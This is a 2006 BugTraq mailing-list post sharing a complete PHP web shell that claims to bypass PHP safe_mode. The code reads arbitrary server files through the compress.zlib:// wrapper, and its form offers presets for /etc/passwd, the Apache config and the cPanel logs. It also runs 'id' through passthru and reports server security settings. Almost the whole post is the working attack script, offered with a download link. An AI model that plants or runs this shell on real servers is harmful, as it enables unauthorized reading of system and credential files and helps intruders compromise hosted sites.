BugTraq
new shell bypass safe mode Jul 18 2006 01:32PM
d3nger hotmail com
i programing scripit for passing the safe mode

the code

<head>

<meta http-equiv="Content-Language" content="en-us">

<title></title>

<body bgcolor="#000000" text="#00FF00">

<b>

<font size=-2 face=verdana color=white>

<a bookmark="minipanel" style="font-weight: normal; color: #dadada; font-family: verdana; text-decoration: none">

<font size=-2 face=verdana color=white>

<TABLE style="BORDER-COLLAPSE: collapse" height=18 cellSpacing=0 borderColorDark=#666666 cellPadding=0 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr>

<td width="990" height="18" valign="top" style="font-family: verdana; color: #d9d9d9; font-size: 11px">

<p align="center">

<font face="Arial">  </font><font face="Arial" color="#1FE51A">

Design And Programing by D3nGeR [at] HotMail [dot] CoM</font></p></td></tr></table></font></a></font></b>

<p align="center"><b><font face="Webdings" size="6" color="#FF0000">!</font><font face="Tahoma" size="4" color="#FFFFFF">DaNgEr

SaFe M0dE ShEll v1.0</font><font face="Webdings" size="6" color="#FF0000">!</font></b></p>

<form method="POST">

<p align="center">Extra:

<select size="1" name="file" style="font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666; background-color: #800000">

<option value="/var/cpanel/accounting.log" style="font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666; background-color: #800000">View cpanel logs</option>

<option value="/etc/httpd/conf/httpd.conf" style="font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666; background-color: #800000">Apache config</option>

<option value="/etc/passwd" style="font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666; background-color: #800000">Get /etc/passwd</option>

<option value="/etc/hosts" style="font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666; background-color: #800000">Hosts</option>

</select>

<input type="submit" value="Go" name="B1" style="font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666; background-color: #800000"></p>

</form>

<table border=1 width=100% style="border-style:solid; border-width:1px; color: #00FF00; background-color: #000000" bordercolorlight="#000000" bordercolordark="#000000"><tr>

<font size="4px">

<b>

<font size=-2 face=verdana color=white>

<td>

<font size=-2 face=verdana>

<font size="4px">

<font face="Arial">

<b><font size="1"><span lang="ar-sa">uname -a</span>: <?php echo php_uname(); ?></font></b></font><font size="1"><b><font face="Arial"> </font></b></font></font><b> </b>

<br>

<b><span lang="ar-sa">ID:</span>:</b> <? passthru("id");?></div></td>

</font></b>

</font>

</tr></table>

</head>

<?php

/*

by D3nGeR

D3nger [at] Hotmail [dot] CoM

*/

$file=""; // File to Include... or use _GET _POST

$tymczas=""; // Set $tymczas to dir where you have 777 like /var/tmp

if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on")

{

$safemode = true;

$hsafemode = "<font color=\"red\">ON (secure)</font>";

}

else {$safemode = false; $hsafemode = "<font color=\"green\">OFF (not secure)</font>";}

echo("Safe-mode: $hsafemode");

$v = @ini_get("open_basedir");

if ($v or strtolower($v) == "on") {$openbasedir = true; $hopenbasedir = "<font color=\"red\">".$v."</font>";}

else {$openbasedir = false; $hopenbasedir = "<font color=\"green\">OFF (not secure)</font>";}

echo("<br>");

echo("Open base dir: $hopenbasedir");

echo("<br>");

$version=("Safe Mode Shell 1.5(beta)");

echo "Disable functions : <b>";

if(''==($df=@ini_get('disable_functions'))){echo "<font color=green>NONE</font></b>";}else{echo "<font color=red>$df</font></b>";}

$free = @diskfreespace($dir);

if (!$free) {$free = 0;}

$all = @disk_total_space($dir);

if (!$all) {$all = 0;}

$used = $all-$free;

$used_percent = @round(100/($all/$free),2);

error_reporting(E_WARNING);

ini_set("display_errors", 1);

echo "<PRE>\n";

if(empty($file)){

if(empty($_GET['file'])){

if(empty($_POST['file'])){

die("\nSet varibles \$tymczas, \$file or use for varible file POST, GET like

?file=/etc/passwd\n <B><CENTER><FONT

COLOR=\"RED\">MaDe By D3nGeR

</FONT></CENTER></B>");

} else {

$file=$_POST['file'];

}

} else {

$file=$_GET['file'];

}

}

$temp=tempnam($tymczas, "cx");

if(copy("compress.zlib://".$file, $temp)){

$zrodlo = fopen($temp, "r");

$tekst = fread($zrodlo, filesize($temp));

fclose($zrodlo);

echo "<B>--- Start File ".htmlspecialchars($file)."

-------------</B>\n".htmlspecialchars($tekst)."\n<B>--- End File

".htmlspecialchars($file)." ---------------\n";

unlink($temp);

die("\n<FONT COLOR=\"RED\"><B>File

".htmlspecialchars($file)." has been already loaded. D3nGeR

;]</B></FONT>");

} else {

die("<FONT COLOR=\"RED\"><CENTER>Sorry... File

<B>".htmlspecialchars($file)."</B> dosen't exists or you don't have

access.</CENTER></FONT>");

}

the file in zip file

http://anti-security.net/downloads/safe-acces.zip

see u bye

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus